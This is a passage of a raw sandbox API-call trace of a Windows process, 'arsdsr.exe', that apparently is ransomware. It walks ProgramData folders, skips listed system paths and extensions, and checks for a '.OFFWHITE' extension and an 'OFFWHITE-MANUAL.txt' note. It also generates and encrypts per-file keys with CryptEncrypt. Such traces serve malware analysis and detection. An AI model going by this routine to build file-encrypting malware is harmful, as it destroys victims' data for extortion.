stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.141] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.141] GetProcessHeap () returned 0x500000 [0144.141] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ea00 [0144.141] GetProcessHeap () returned 0x500000 [0144.141] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53a850 [0144.141] GetProcessHeap () returned 0x500000 [0144.141] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55f440 [0144.141] GetProcessHeap () returned 0x500000 [0144.141] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55f548 [0144.141] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.141] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.141] SystemFunction036 (in: RandomBuffer=0x53ea00, RandomBufferLength=0x10 | out: RandomBuffer=0x53ea00) returned 1 [0144.141] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.141] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.141] SystemFunction036 (in: RandomBuffer=0x53a850, RandomBufferLength=0x10 | out: RandomBuffer=0x53a850) returned 1 [0144.141] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.141] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.141] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55f440*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55f440*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.142] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.142] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.142] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55f548*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55f548*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.142] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.142] SetLastError (dwErrCode=0x0) [0144.142] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55f440, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.142] GetLastError () returned 0x6 [0144.142] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c0ee1d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="scan_property.ico", cAlternateFileName="")) returned 1 [0144.142] lstrcmpiW (lpString1="scan_property.ico", lpString2=".") returned 1 [0144.142] lstrcmpiW (lpString1="scan_property.ico", lpString2="..") returned 1 [0144.142] lstrcmpiW (lpString1="scan_property.ico", lpString2="...") returned 1 [0144.142] lstrcmpiW (lpString1="scan_property.ico", lpString2="windows") returned -1 [0144.142] lstrcmpiW (lpString1="scan_property.ico", lpString2="$recycle.bin") returned 1 [0144.142] lstrcmpiW (lpString1="scan_property.ico", lpString2="rsa") returned 1 [0144.142] lstrcmpiW (lpString1="scan_property.ico", lpString2="ntuser.dat") returned 1 [0144.142] lstrcmpiW (lpString1="scan_property.ico", lpString2="programdata") returned 1 [0144.142] lstrcmpiW (lpString1="scan_property.ico", lpString2="appdata") returned 1 [0144.142] lstrcmpiW (lpString1="scan_property.ico", lpString2="program files") returned 1 [0144.142] lstrcmpiW (lpString1="scan_property.ico", lpString2="program files (x86)") returned 1 [0144.142] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" [0144.143] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="scan_property.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" [0144.143] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.143] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.143] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.143] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.143] lstrcmpiW (lpString1="scan_property.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.143] GetProcessHeap () returned 0x500000 [0144.143] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e940 [0144.143] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.144] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.144] GetProcessHeap () returned 0x500000 [0144.144] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53a808 [0144.144] GetProcessHeap () returned 0x500000 [0144.144] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53a820 [0144.144] GetProcessHeap () returned 0x500000 [0144.144] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55f650 [0144.144] GetProcessHeap () returned 0x500000 [0144.144] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55f758 [0144.144] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.144] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.144] SystemFunction036 (in: RandomBuffer=0x53a808, RandomBufferLength=0x10 | out: RandomBuffer=0x53a808) returned 1 [0144.144] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.144] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.144] SystemFunction036 (in: RandomBuffer=0x53a820, RandomBufferLength=0x10 | out: RandomBuffer=0x53a820) returned 1 [0144.144] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.144] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.144] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55f650*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55f650*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.145] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.145] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.145] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55f758*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55f758*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.145] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.145] SetLastError (dwErrCode=0x0) [0144.145] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55f650, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.145] GetLastError () returned 0x6 [0144.145] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f138d40, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f138d40, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c34f7b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1 [0144.145] lstrcmpiW (lpString1="scan_settings.ico", lpString2=".") returned 1 [0144.145] lstrcmpiW (lpString1="scan_settings.ico", lpString2="..") returned 1 [0144.145] lstrcmpiW (lpString1="scan_settings.ico", lpString2="...") returned 1 [0144.145] lstrcmpiW (lpString1="scan_settings.ico", lpString2="windows") returned -1 [0144.145] lstrcmpiW (lpString1="scan_settings.ico", lpString2="$recycle.bin") returned 1 [0144.145] lstrcmpiW (lpString1="scan_settings.ico", lpString2="rsa") returned 1 [0144.145] lstrcmpiW (lpString1="scan_settings.ico", lpString2="ntuser.dat") returned 1 [0144.145] lstrcmpiW (lpString1="scan_settings.ico", lpString2="programdata") returned 1 [0144.145] lstrcmpiW (lpString1="scan_settings.ico", lpString2="appdata") returned 1 [0144.145] lstrcmpiW (lpString1="scan_settings.ico", lpString2="program files") returned 1 [0144.145] lstrcmpiW (lpString1="scan_settings.ico", lpString2="program files (x86)") returned 1 [0144.146] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" [0144.146] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="scan_settings.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" [0144.146] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.146] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.146] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.146] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.146] lstrcmpiW (lpString1="scan_settings.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.146] GetProcessHeap () returned 0x500000 [0144.146] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e950 [0144.146] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.147] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.147] GetProcessHeap () returned 0x500000 [0144.147] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546998 [0144.147] GetProcessHeap () returned 0x500000 [0144.147] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469b0 [0144.147] GetProcessHeap () returned 0x500000 [0144.147] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55f860 [0144.147] GetProcessHeap () returned 0x500000 [0144.147] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55f968 [0144.147] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.147] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.147] SystemFunction036 (in: RandomBuffer=0x546998, RandomBufferLength=0x10 | out: RandomBuffer=0x546998) returned 1 [0144.147] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.147] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.147] SystemFunction036 (in: RandomBuffer=0x5469b0, RandomBufferLength=0x10 | out: RandomBuffer=0x5469b0) returned 1 [0144.147] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.147] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.147] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55f860*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55f860*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.148] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.148] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.148] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55f968*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55f968*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.148] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.148] SetLastError (dwErrCode=0x0) [0144.148] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55f860, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.148] GetLastError () returned 0x6 [0144.148] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f054512, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f054512, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7d3f90d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0144.148] lstrcmpiW (lpString1="tasks.xml", lpString2=".") returned 1 [0144.148] lstrcmpiW (lpString1="tasks.xml", lpString2="..") returned 1 [0144.148] lstrcmpiW (lpString1="tasks.xml", lpString2="...") returned 1 [0144.148] lstrcmpiW (lpString1="tasks.xml", lpString2="windows") returned -1 [0144.148] lstrcmpiW (lpString1="tasks.xml", lpString2="$recycle.bin") returned 1 [0144.148] lstrcmpiW (lpString1="tasks.xml", lpString2="rsa") returned 1 [0144.148] lstrcmpiW (lpString1="tasks.xml", lpString2="ntuser.dat") returned 1 [0144.148] lstrcmpiW (lpString1="tasks.xml", lpString2="programdata") returned 1 [0144.148] lstrcmpiW (lpString1="tasks.xml", lpString2="appdata") returned 1 [0144.148] lstrcmpiW (lpString1="tasks.xml", lpString2="program files") returned 1 [0144.148] lstrcmpiW (lpString1="tasks.xml", lpString2="program files (x86)") returned 1 [0144.149] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" [0144.149] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="tasks.xml" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" [0144.149] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.149] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.149] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0144.149] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0144.149] lstrcmpiW (lpString1="tasks.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.149] GetProcessHeap () returned 0x500000 [0144.149] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e960 [0144.149] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.150] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.150] GetProcessHeap () returned 0x500000 [0144.150] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469c8 [0144.150] GetProcessHeap () returned 0x500000 [0144.150] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469e0 [0144.150] GetProcessHeap () returned 0x500000 [0144.150] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fa70 [0144.150] GetProcessHeap () returned 0x500000 [0144.150] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fb78 [0144.150] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.150] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.150] SystemFunction036 (in: RandomBuffer=0x5469c8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469c8) returned 1 [0144.150] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.150] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.150] SystemFunction036 (in: RandomBuffer=0x5469e0, RandomBufferLength=0x10 | out: RandomBuffer=0x5469e0) returned 1 [0144.150] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.150] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.150] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fa70*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fa70*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.151] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.151] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.151] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fb78*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fb78*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.151] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.151] SetLastError (dwErrCode=0x0) [0144.151] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55fa70, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.151] GetLastError () returned 0x6 [0144.151] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f054512, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f054512, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7d3f90d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="tasks.xml", cAlternateFileName="")) returned 0 [0144.151] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0144.151] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 [0144.151] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0144.153] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Task", cAlternateFileName="")) returned 0 [0144.153] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0144.154] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd789d88f, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0144.154] lstrcmpiW (lpString1="DeviceSync", lpString2=".") returned 1 [0144.154] lstrcmpiW (lpString1="DeviceSync", lpString2="..") returned 1 [0144.154] lstrcmpiW (lpString1="DeviceSync", lpString2="...") returned 1 [0144.154] lstrcmpiW (lpString1="DeviceSync", lpString2="windows") returned -1 [0144.154] lstrcmpiW (lpString1="DeviceSync", lpString2="$recycle.bin") returned 1 [0144.154] lstrcmpiW (lpString1="DeviceSync", lpString2="rsa") returned -1 [0144.154] lstrcmpiW (lpString1="DeviceSync", lpString2="ntuser.dat") returned -1 [0144.154] lstrcmpiW (lpString1="DeviceSync", lpString2="programdata") returned -1 [0144.154] lstrcmpiW (lpString1="DeviceSync", lpString2="appdata") returned 1 [0144.154] lstrcmpiW (lpString1="DeviceSync", lpString2="program files") returned -1 [0144.154] lstrcmpiW (lpString1="DeviceSync", lpString2="program files (x86)") returned -1 [0144.154] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0144.154] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", 